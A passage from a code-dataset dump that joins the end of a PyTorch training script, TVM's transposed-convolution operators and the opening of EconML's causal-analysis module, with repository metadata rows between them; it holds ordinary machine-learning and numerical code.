# Actual backpropagation
step_loss.backward()
optimiser.step()
# -------------------------------------------------------
# Reporting / admin
step_loss = step_loss.cpu().data.numpy()
if current_step % 10 == 0:
if is_MT:
KLD_part = KLD.cpu().data.numpy()
print(
"step {0:04d}; step_loss: {1:.4f} ({2:.4f})".format(current_step, step_loss, step_loss - KLD_part)
)
else:
print("step {0:04d}; step_loss: {1:.4f}".format(current_step, step_loss))
step_time += (time.time() - start_time) / args.test_every
loss += step_loss / args.test_every
current_step += 1
if current_step % 20 == 0:
sys.stdout.flush()
# Decay learning rate (if appl.)
if current_step % args.learning_rate_step == 0:
for param_group in optimiser.param_groups:
param_group["lr"] *= args.learning_rate_decay_factor
print("Decay learning rate. New value at " + str(optimiser.param_groups[0]["lr"]))
# remove Hard EM spec (if appl.)
if is_hard_em and zls_ix is not None and current_step == args.hard_em_iters:
optimiser.param_groups[zls_ix]["lr"] = z_lr
model.standardise_aggregate_posterior()
# Once in a while, we save checkpoint, print statistics, and run evals.
if current_step % args.test_every == 0:
model.eval()
# === CANNOT DO TEST SET EVALUATION SINCE DONT KNOW LATENT Z ===
# inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
# inputs, outputs = torchify(inputs, outputs, device=device)
#
# if is_MT:
# preds, state = model(inputs, mu, sd)
# else:
# preds = model(inputs)
#
# err = (preds - outputs)
# if has_weight:
# err = err * torch.cat((torch.ones(1, 1, 3) * np.sqrt(args.first3_prec),
# torch.ones(1, 1, args.human_size - 3)), dim=2).to(err.device)
#
# if not has_ar_noise:
# sqerr = err ** 2
# else:
# Prec_test = ar_prec_matrix(args.ar_coef, err.size(1)).float().to(device)
# sqerr = (Prec_test @ err) * err
#
# val_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
#
# if is_MT:
# logstd = torch.log(sd)
# KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
# val_loss = val_loss + KLD
#
# print()
# print("{0: <16} |".format("milliseconds"), end="")
# for ms in [60, 240, 480, 750, 990, 1500, 2010]:
# print(" {0:5d} |".format(ms), end="")
# print()
#
# avg_mse_tt = sqerr.detach().cpu().mean(dim=0).numpy().mean(axis=1)
# Pretty print of the results for 60, 240, 480, 750, 990, 1500, 2010 ms
# print("{0: <16} |".format(" "), end="")
# for ms in [1, 7, 15, 24, 32, 49, 66]:
# if args.seq_length_out >= ms + 1:
# print(" {0:.3f} |".format(avg_mse_tt[ms]), end="")
# else:
# print(" n/a |", end="")
# print()
#
# print()
# print("============================\n"
# "Global step: %d\n"
# "Learning rate: %.4f\n"
# "Step-time (ms): %.4f\n"
# "Train loss avg: %.4f\n"
# "--------------------------\n"
# "Test loss: %.4f\n"
# "============================" % (current_step,
# args.learning_rate, step_time * 1000, loss,
# val_loss))
torch.save(model, args.train_dir + "/model_" + str(current_step))
# print()
previous_losses.append(loss)
# Reset global time and loss
step_time, loss = 0, 0
sys.stdout.flush()
def sample(args):
raise NotImplementedError("Sampling not yet implemented: unsure how to deal with unknown latent z.")
train_set_Y, train_set_U, test_set_Y, test_set_U = read_all_data(args)
model = create_model(args)
model.eval()
if not args.use_cpu:
model = model.cuda()
print("Model created")
inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
inputs = Variable(torch.from_numpy(inputs).float())
outputs = Variable(torch.from_numpy(outputs).float())
if not args.use_cpu:
        inputs, outputs = inputs.cuda(), outputs.cuda()
if args.k > 0:
preds, mu, logstd, state = model(inputs, outputs)
else:
preds = model(inputs)
loss = (preds - outputs) ** 2
loss.cpu().data.numpy()
loss = loss.mean()
preds = preds.cpu().data.numpy()
preds = preds.transpose([1, 0, 2])
loss = loss.cpu().data.numpy()
np.savez("mt_predictions_{0}.npz".format(args.style_ix), preds=preds, actual=outputs)
return
def ar_prec_matrix(rho, n):
    # Banded AR(1) precision matrix construction (tridiagonal)
Prec = np.zeros((n, n))
i, j = np.indices(Prec.shape)
Prec[i == j] = 1 + rho ** 2
Prec[i == j - 1] = -rho
    Prec[i == j + 1] = -rho
return torch.tensor(Prec)
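# Illustrative check (editorial sketch): with rho = 0.5 and n = 4 the matrix built above is
# tridiagonal, with 1 + rho**2 = 1.25 on the diagonal and -rho = -0.5 on the first
# off-diagonals:
#   [[ 1.25, -0.5 ,  0.  ,  0.  ],
#    [-0.5 ,  1.25, -0.5 ,  0.  ],
#    [ 0.  , -0.5 ,  1.25, -0.5 ],
#    [ 0.  ,  0.  , -0.5 ,  1.25]]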
def load_layer1(model, layer1_filename, use_cpu):
model_gru1 = torch.load(layer1_filename, map_location="cpu") if use_cpu else torch.load(layer1_filename)
if isinstance(model_gru1, mtfixb_model.OpenLoopGRU):
model.layer1_rnn = model_gru1.rnn
# model.layer1_linear = model_gru2.emission
else:
model.layer1_rnn = model_gru1.rnn2
return model
def read_all_data(args):
"""
Loads data for training/testing and normalizes it.
Args
data_dir: directory to load the data from
style_ix: style index of the test set (and leave out from the training set)
njoints: number of joints to model (0 or -1 = all)
    Returns
      train_iter: a DataIterator over the training sequences (all styles except
        style_ix, unless train_set_size == 0, in which case every style is used)
"""
# === Read training data ===
print("Reading training data (test index {0:d}).".format(args.style_ix))
njoints = args.human_size
if not args.train_set_size == -1:
style_lkp = {
str(i): range(1 + args.train_set_size * (i - 1), 1 + args.train_set_size * i) for i in range(1, 8 + 1)
}
else:
style_lkp = np.load(os.path.join(args.data_dir, args.stylelkp_fname))
train_set_Y = np.load(os.path.join(args.data_dir, args.output_fname))
train_set_U = np.load(os.path.join(args.data_dir, args.input_fname))
njoints = train_set_Y[str(0)].shape[1] if njoints <= 0 else njoints
if args.train_set_size != 0:
train_ixs = np.concatenate(
[
style_lkp[str(i)] for i in range(1, len(style_lkp.keys()) + 1) if i != args.style_ix
] # CAREFUL: jl is 1-based!
)
train_set_Y = [train_set_Y[str(i)][:, :njoints] for i in train_ixs]
train_set_U = [train_set_U[str(i)] for i in train_ixs]
else:
assert args.style_ix not in range(1, 9), "no support for LOO experiments with max MTL data yet. Use style_ix=9"
train_set_Y = [train_set_Y[str(i + 1)][:, :njoints] for i in range(len(train_set_Y))]
train_set_U = [train_set_U[str(i + 1)] for i in range(len(train_set_U))]
print("Using files {:s}; {:s}".format(args.input_fname, args.output_fname))
print("done reading data.")
return mtfixb_model.DataIterator(train_set_Y, train_set_U, 64, min_size=64, overlap2=args.overlap_windows)
def torchify(*args, device="cpu"):
return [Variable(torch.from_numpy(arg).float()).to(device) for arg in args]
def main(args=None):
args = parseopts.parse_args(args)
args = parseopts.initial_arg_transform(args)
print(args.train_dir)
os.makedirs(args.train_dir, exist_ok=True)
if args.sample:
sample(args)
else:
train(args)
return args
if __name__ == "__main__":
main()
| 33.739958
| 119
| 0.59208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,431
| 0.277649
|
c408095eb7ab9da191765321215bacfdbf223067
| 11,260
|
py
|
Python
|
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | 4
|
2020-04-14T12:31:45.000Z
|
2020-11-02T14:20:59.000Z
|
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/topi/nn/conv2d_transpose.py
|
ccjoechou/tvm
|
779dc51e1332f417fa4c304b595ce76891dfc33a
|
[
"Apache-2.0"
] | 1
|
2020-11-02T14:21:45.000Z
|
2020-11-02T14:21:45.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
from itertools import repeat
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
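# Illustrative behaviour (editorial note): _pair(3) -> (3, 3), while an iterable of the
# right length passes through unchanged, e.g. _pair((2, 4)) -> (2, 4).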
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return declaration_conv2d_transpose_impl(
Input, Filter, strides, padding, out_dtype, output_padding=output_padding
)
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
"""Preprocess data and kernel to make the compute pattern
of conv2d_transpose the same as conv2d"""
batch, in_c, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert opad_h < stride_h and opad_w < stride_w
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_c, filter_h, filter_w),
lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
"""Implementation of conv2d transpose"""
data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
data, kernel, strides, padding, out_dtype, output_padding
)
batch, in_c, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_c = simplify(out_c)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_c), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
Output = te.compute(
(batch, out_c, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
* kernel_transform[c, dc, dh, dw].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="conv2d_transpose_nchw",
)
return Output
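# Editorial note (hedged): combining the dilation, padding and VALID-style convolution above,
# the output spatial size reduces to the usual transposed-convolution formula
#   out_h = (in_h - 1) * stride_h - (fpad_top + fpad_bottom) + filter_h + opad_h
# (and analogously for out_w); e.g. in_h = 4, stride_h = 2, filter_h = 3, padding = 1 and
# opad_h = 1 give out_h = 3*2 - 2 + 3 + 1 = 8.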
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
"""Group convolution operator in NCHW layout.
Parameters
----------
data : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.te.Tensor
4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
stride : int or a list/tuple of two ints
Stride size, or [stride_height, stride_width]
padding : int or a list/tuple of 2 or 4 ints
padding size, or
[pad_height, pad_width] for 2 ints, or
[pad_top, pad_left, pad_bottom, pad_right] for 4 ints
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
groups : int
number of groups
out_dtype : str
The output type. This is used for mixed precision.
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
if groups == 1:
return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
    # some pre-processing and preliminary checks
if out_dtype is None:
out_dtype = data.dtype
batch, in_channels, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
assert (
in_channels % groups == 0
), f"input channels {in_channels} must divide group size {groups}"
# assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
strides = _pair(stride)
# padding = _pair(padding)
# output_padding = _pair(output_padding)
# dilation = _pair(dilation)
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert (
opad_h < stride_h and opad_w < stride_w
), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_channels, filter_h, filter_w),
lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
batch, in_channels, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_channels = simplify(out_c * groups)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_channels // groups), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
# data: batch, in_channels, out_h, out_w
# weight: out_channels // G, in_channels, out_h, out_w
return te.compute(
(batch, out_channels, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[
b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
].astype(out_dtype)
* kernel_transform[
c % (out_channels // groups),
c // (out_channels // groups) * (in_channels // groups) + dc,
dh,
dw,
].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="group_conv2d_transpose_nchw",
)
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
"""Transform a tensor with the current layout to the desired layout.
E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])
Parameters
----------
tensor: relay.Expr
The Tensor to transpose
current_layout: str
The current layout e.g. NCHW or OIHW
desired_layout: str
The desired layout, must be compatible with current_layout
Returns
-------
The layout_transformed tensor.
"""
if sorted(current_layout) != sorted(desired_layout):
raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")
if current_layout == desired_layout:
return tensor
current_layout_map = {c: i for i, c in enumerate(current_layout)}
desired_layout_map = {c: i for i, c in enumerate(desired_layout)}
axes = [None] * len(current_layout)
for c, i in desired_layout_map.items():
axes[i] = current_layout_map[c]
return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
"""Legalizes Transposed 2D convolution op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed 2D convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
data, kernel = inputs
kernel_layout = attrs["kernel_layout"]
if attrs["data_layout"] == "NHWC":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
# Set new attrs for conv2d_transpose.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["data_layout"] = "NCHW"
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
# Convert data to NCHW.
data = relay.transpose(data, axes=(0, 3, 1, 2))
deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
# Convert back to original NHWC layout.
out = relay.transpose(deconv, axes=(0, 2, 3, 1))
return out
if attrs["data_layout"] == "NCHW":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
new_attrs = {k: attrs[k] for k in attrs.keys()}
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
return relay.nn.conv2d_transpose(data, kernel, **new_attrs)
return None
| 34.329268
| 99
| 0.653819
| 0
| 0
| 0
| 0
| 1,580
| 0.14032
| 0
| 0
| 5,060
| 0.449378
|
c40810867a32dd051fe382d63b22b8bac17db49f
| 91,964
|
py
|
Python
|
econml/solutions/causal_analysis/_causal_analysis.py
|
huigangchen/EconML
|
9a56d651e2964ebd05144de52f577f9044a22a0b
|
[
"BSD-3-Clause"
] | 1,846
|
2019-05-06T21:14:19.000Z
|
2022-03-31T11:52:21.000Z
|
econml/solutions/causal_analysis/_causal_analysis.py
|
cleeway/EconML
|
fb2d1139f6c271d4b9a24d9c6d122d4d0891afb0
|
[
"BSD-3-Clause"
] | 393
|
2019-05-08T00:55:32.000Z
|
2022-03-31T14:26:16.000Z
|
econml/solutions/causal_analysis/_causal_analysis.py
|
cleeway/EconML
|
fb2d1139f6c271d4b9a24d9c6d122d4d0891afb0
|
[
"BSD-3-Clause"
] | 414
|
2019-05-14T03:51:08.000Z
|
2022-03-31T09:32:17.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Module for assessing causal feature importance."""
import warnings
from collections import OrderedDict, namedtuple
import joblib
import lightgbm as lgb
from numba.core.utils import erase_traceback
import numpy as np
from numpy.lib.function_base import iterable
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, RandomForestRegressor
from sklearn.linear_model import Lasso, LassoCV, LogisticRegression, LogisticRegressionCV
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, StandardScaler
from sklearn.tree import _tree
from sklearn.utils.validation import column_or_1d
from ...cate_interpreter import SingleTreeCateInterpreter, SingleTreePolicyInterpreter
from ...dml import LinearDML, CausalForestDML
from ...inference import NormalInferenceResults
from ...sklearn_extensions.linear_model import WeightedLasso
from ...sklearn_extensions.model_selection import GridSearchCVList
from ...utilities import _RegressionWrapper, inverse_onehot
# TODO: this utility is documented but internal; reimplement?
from sklearn.utils import _safe_indexing
# TODO: this utility is even less public...
from sklearn.utils import _get_column_indices
class _CausalInsightsConstants:
RawFeatureNameKey = 'raw_name'
EngineeredNameKey = 'name'
CategoricalColumnKey = 'cat'
TypeKey = 'type'
PointEstimateKey = 'point'
StandardErrorKey = 'stderr'
ZStatKey = 'zstat'
ConfidenceIntervalLowerKey = 'ci_lower'
ConfidenceIntervalUpperKey = 'ci_upper'
PValueKey = 'p_value'
Version = 'version'
CausalComputationTypeKey = 'causal_computation_type'
ConfoundingIntervalKey = 'confounding_interval'
ViewKey = 'view'
InitArgsKey = 'init_args'
RowData = 'row_data' # NOTE: RowData is mutually exclusive with the other data columns
ALL = [RawFeatureNameKey,
EngineeredNameKey,
CategoricalColumnKey,
TypeKey,
PointEstimateKey,
StandardErrorKey,
ZStatKey,
ConfidenceIntervalLowerKey,
ConfidenceIntervalUpperKey,
PValueKey,
Version,
CausalComputationTypeKey,
ConfoundingIntervalKey,
ViewKey,
InitArgsKey,
RowData]
def _get_default_shared_insights_output():
"""
Dictionary elements shared among all analyses.
In case of breaking changes to this dictionary output, the major version of this
dictionary should be updated. In case of a change to this dictionary, the minor
version should be updated.
"""
return {
_CausalInsightsConstants.RawFeatureNameKey: [],
_CausalInsightsConstants.EngineeredNameKey: [],
_CausalInsightsConstants.CategoricalColumnKey: [],
_CausalInsightsConstants.TypeKey: [],
_CausalInsightsConstants.Version: '1.0',
_CausalInsightsConstants.CausalComputationTypeKey: "simple",
_CausalInsightsConstants.ConfoundingIntervalKey: None,
_CausalInsightsConstants.InitArgsKey: {}
}
def _get_default_specific_insights(view):
# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged
return {
_CausalInsightsConstants.PointEstimateKey: [],
_CausalInsightsConstants.StandardErrorKey: [],
_CausalInsightsConstants.ZStatKey: [],
_CausalInsightsConstants.ConfidenceIntervalLowerKey: [],
_CausalInsightsConstants.ConfidenceIntervalUpperKey: [],
_CausalInsightsConstants.PValueKey: [],
_CausalInsightsConstants.ViewKey: view
}
def _get_metadata_causal_insights_keys():
return [_CausalInsightsConstants.Version,
_CausalInsightsConstants.CausalComputationTypeKey,
_CausalInsightsConstants.ConfoundingIntervalKey,
_CausalInsightsConstants.ViewKey]
def _get_column_causal_insights_keys():
return [_CausalInsightsConstants.RawFeatureNameKey,
_CausalInsightsConstants.EngineeredNameKey,
_CausalInsightsConstants.CategoricalColumnKey,
_CausalInsightsConstants.TypeKey]
def _get_data_causal_insights_keys():
return [_CausalInsightsConstants.PointEstimateKey,
_CausalInsightsConstants.StandardErrorKey,
_CausalInsightsConstants.ZStatKey,
_CausalInsightsConstants.ConfidenceIntervalLowerKey,
_CausalInsightsConstants.ConfidenceIntervalUpperKey,
_CausalInsightsConstants.PValueKey]
def _first_stage_reg(X, y, *, automl=True, random_state=None, verbose=0):
if automl:
model = GridSearchCVList([LassoCV(random_state=random_state),
RandomForestRegressor(
n_estimators=100, random_state=random_state, min_samples_leaf=10),
lgb.LGBMRegressor(num_leaves=32, random_state=random_state)],
param_grid_list=[{},
{'min_weight_fraction_leaf':
[.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=3,
scoring='r2',
verbose=verbose)
best_est = model.fit(X, y).best_estimator_
if isinstance(best_est, LassoCV):
return Lasso(alpha=best_est.alpha_, random_state=random_state)
else:
return best_est
else:
model = LassoCV(cv=5, random_state=random_state).fit(X, y)
return Lasso(alpha=model.alpha_, random_state=random_state)
def _first_stage_clf(X, y, *, make_regressor=False, automl=True, min_count=None, random_state=None, verbose=0):
# use same Cs as would be used by default by LogisticRegressionCV
cs = np.logspace(-4, 4, 10)
if min_count is None:
min_count = _CAT_LIMIT # we have at least this many instances
if automl:
# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification
# which could affect how many times each distinct Y value needs to be present in the data
model = GridSearchCVList([LogisticRegression(max_iter=1000,
random_state=random_state),
RandomForestClassifier(n_estimators=100, min_samples_leaf=10,
random_state=random_state),
lgb.LGBMClassifier(num_leaves=32, random_state=random_state)],
param_grid_list=[{'C': cs},
{'max_depth': [3, None],
'min_weight_fraction_leaf': [.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=min(3, min_count),
scoring='neg_log_loss',
verbose=verbose)
est = model.fit(X, y).best_estimator_
else:
model = LogisticRegressionCV(
cv=min(5, min_count), max_iter=1000, Cs=cs, random_state=random_state).fit(X, y)
est = LogisticRegression(C=model.C_[0], max_iter=1000, random_state=random_state)
if make_regressor:
return _RegressionWrapper(est)
else:
return est
def _final_stage(*, random_state=None, verbose=0):
return GridSearchCVList([WeightedLasso(random_state=random_state),
RandomForestRegressor(n_estimators=100, random_state=random_state, verbose=verbose)],
param_grid_list=[{'alpha': [.001, .01, .1, 1, 10]},
{'max_depth': [3, 5],
'min_samples_leaf': [10, 50]}],
cv=3,
scoring='neg_mean_squared_error',
verbose=verbose)
# simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns
# but also supports get_feature_names with expected signature
class _ColumnTransformer(TransformerMixin):
def __init__(self, categorical, passthrough):
self.categorical = categorical
self.passthrough = passthrough
def fit(self, X):
cat_cols = _safe_indexing(X, self.categorical, axis=1)
if cat_cols.shape[1] > 0:
self.has_cats = True
# NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value
self.one_hot_encoder = OneHotEncoder(sparse=False,
handle_unknown='ignore').fit(cat_cols)
else:
self.has_cats = False
self.d_x = X.shape[1]
return self
def transform(self, X):
rest = _safe_indexing(X, self.passthrough, axis=1)
if self.has_cats:
cats = self.one_hot_encoder.transform(_safe_indexing(X, self.categorical, axis=1))
# NOTE: we rely on the passthrough columns coming first in the concatenated X;W
# when we pipeline scaling with our first stage models later, so the order here is important
return np.hstack((rest, cats))
else:
return rest
def get_feature_names(self, names=None):
if names is None:
names = [f"x{i}" for i in range(self.d_x)]
rest = _safe_indexing(names, self.passthrough, axis=0)
if self.has_cats:
cats = self.one_hot_encoder.get_feature_names(
_safe_indexing(names, self.categorical, axis=0))
return np.concatenate((rest, cats))
else:
return rest
# Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy
class _Wrapper:
def __init__(self, item):
self.item = item
class _FrozenTransformer(TransformerMixin, BaseEstimator):
def __init__(self, wrapper):
self.wrapper = wrapper
def fit(self, X, y):
return self
def transform(self, X):
return self.wrapper.item.transform(X)
def _freeze(transformer):
return _FrozenTransformer(_Wrapper(transformer))
# Convert python objects to (possibly nested) types that can easily be represented as literals
def _sanitize(obj):
if obj is None or isinstance(obj, (bool, int, str, float)):
return obj
elif isinstance(obj, dict):
return {_sanitize(key): _sanitize(obj[key]) for key in obj}
else:
try:
return [_sanitize(item) for item in obj]
except Exception:
raise ValueError(f"Could not sanitize input {obj}")
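# Illustrative behaviour (editorial sketch): nested containers become plain lists/dicts of
# literals, e.g. _sanitize({"a": (1, 2), "b": None}) returns {'a': [1, 2], 'b': None}.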
# Convert SingleTreeInterpreter to a python dictionary
def _tree_interpreter_to_dict(interp, features, leaf_data=lambda t, n: {}):
tree = interp.tree_model_.tree_
node_dict = interp.node_dict_
def recurse(node_id):
if tree.children_left[node_id] == _tree.TREE_LEAF:
return {'leaf': True, 'n_samples': tree.n_node_samples[node_id], **leaf_data(tree, node_id, node_dict)}
else:
return {'leaf': False, 'feature': features[tree.feature[node_id]], 'threshold': tree.threshold[node_id],
'left': recurse(tree.children_left[node_id]),
'right': recurse(tree.children_right[node_id])}
return recurse(0)
class _PolicyOutput:
"""
A type encapsulating various information related to a learned policy.
Attributes
----------
tree_dictionary:dict
The policy tree represented as a dictionary,
policy_value:float
The average value of applying the recommended policy (over using the control),
always_treat:dict of string to float
A dictionary mapping each non-control treatment to the value of always treating with it (over control),
control_name:string
The name of the control treatment
"""
def __init__(self, tree_dictionary, policy_value, always_treat, control_name):
self.tree_dictionary = tree_dictionary
self.policy_value = policy_value
self.always_treat = always_treat
self.control_name = control_name
# named tuple type for storing results inside CausalAnalysis class;
# must be lifted to module level to enable pickling
_result = namedtuple("_result", field_names=[
"feature_index", "feature_name", "feature_baseline", "feature_levels", "hinds",
"X_transformer", "W_transformer", "estimator", "global_inference", "treatment_value"])
def _process_feature(name, feat_ind, verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
nuisance_models, h_model, random_state, model_y, cv, mc_iters):
try:
if verbose > 0:
print(f"CausalAnalysis: Feature {name}")
discrete_treatment = feat_ind in categorical_inds
if discrete_treatment:
cats = categories[categorical_inds.index(feat_ind)]
else:
cats = 'auto' # just leave the setting at the default otherwise
# the transformation logic here is somewhat tricky; we always need to encode the categorical columns,
# whether they end up in X or in W. However, for the continuous columns, we want to scale them all
# when running the first stage models, but don't want to scale the X columns when running the final model,
# since then our coefficients will have odd units and our trees will also have decisions using those units.
#
# we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting)
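# Illustrative reading of the routing above (hypothetical columns): if X has columns
# [0: the treatment t, 1: continuous c, 2: categorical k] and hinds = [1], then
#     WX (first-stage input)  -> one-hot(k) followed by scaled(c)
#     W  (controls only)      -> one-hot(k)            (c is reserved for heterogeneity)
#     X  (heterogeneity)      -> c, left unscaled      (its scaling is pipelined into the
#                                                       first-stage models instead)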
hinds = heterogeneity_inds[feat_ind]
WX_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind]),
('drop', 'drop', feat_ind)],
remainder=StandardScaler())
W_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind and ind not in hinds]),
('drop', 'drop', hinds),
('drop_feat', 'drop', feat_ind)],
remainder=StandardScaler())
X_cont_inds = [ind for ind in hinds
if ind != feat_ind and ind not in categorical_inds]
# Use _ColumnTransformer instead of ColumnTransformer so we can get feature names
X_transformer = _ColumnTransformer([ind for ind in categorical_inds
if ind != feat_ind and ind in hinds],
X_cont_inds)
# Controls are all other columns of X
WX = WX_transformer.fit_transform(X)
# can't use X[:, feat_ind] when X is a DataFrame
T = _safe_indexing(X, feat_ind, axis=1)
# TODO: we can't currently handle unseen values of the feature column when getting the effect;
# we might want to modify OrthoLearner (and other discrete treatment classes)
# so that the user can opt-in to allowing unseen treatment values
# (and return NaN or something in that case)
W = W_transformer.fit_transform(X)
X_xf = X_transformer.fit_transform(X)
# HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models
# and so we can just peel the first columns off of that combined array for rescaling in the pipeline
